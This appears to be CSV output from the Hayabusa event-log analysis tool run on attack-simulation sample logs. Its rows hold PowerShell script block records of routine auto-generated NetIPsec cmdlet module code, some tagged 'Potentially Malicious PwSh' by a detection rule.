ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.476 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.476 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.477 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.477 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.480 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.499 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.499 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 